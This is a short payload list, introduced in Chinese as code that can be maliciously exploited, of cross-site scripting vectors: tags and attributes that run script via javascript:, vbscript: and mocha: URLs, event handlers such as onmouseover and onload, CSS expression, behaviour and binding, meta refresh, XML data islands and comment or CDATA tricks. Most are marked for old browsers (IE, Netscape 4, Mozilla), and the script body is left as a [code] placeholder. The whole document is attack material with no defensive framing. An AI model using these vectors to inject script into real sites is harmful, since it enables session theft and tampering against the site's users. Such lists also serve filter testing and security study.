以下是一些可被恶意利用的代码:
<a href="javascript#[code]">
<div onmouseover="[code]">
<img src="/javascript:[code]">
<img dynsrc="/javascript:[code]"> [IE]
<input type="image" dynsrc="/javascript:[code]"> [IE]
<bgsound src="/javascript:[code]"> [IE]
<img src="/&";{[code]};> [N4]
<link rel="stylesheet" href="/javascript:[code]">
<iframe src="/vbscript:[code]"> [IE]
<img src="mocha:[code]"> [N4]
<img src="/livescript:[code]"> [N4]
<a href="about:<script>[code]</script>">
<meta http-equiv="refresh" content="0;url=javascript:[code]">
<body onload="[code]">
<div style="background-image: url(/javascript:[code]);">
<div style="behaviour: url([link to code]);"> [IE]
<div style="binding: url([link to code]);"> [Mozilla]
<div style="width: expression([code]);"> [IE]
<style type="text/javascript">[code]</style> [N4]
<object classid="clsid:..." codebase="javascript:[code]"> [IE]
<style><!--</style><script>[code]//--></script>
<![CDATA[<!--]]><script>[code]//--></script>
<!-- -- --><script>[code]</script><!-- -- -->
<script>[code]</script>
<img src="/blah"onmouseover="[code]">
<img src="blah>" onmouseover="[code]">
<xml src="/javascript:[code]">
<xml id="X"><a><b><script>[code]</script>;</b></a></xml>
<div datafld="b" dataformatas="html" datasrc="#X"></div>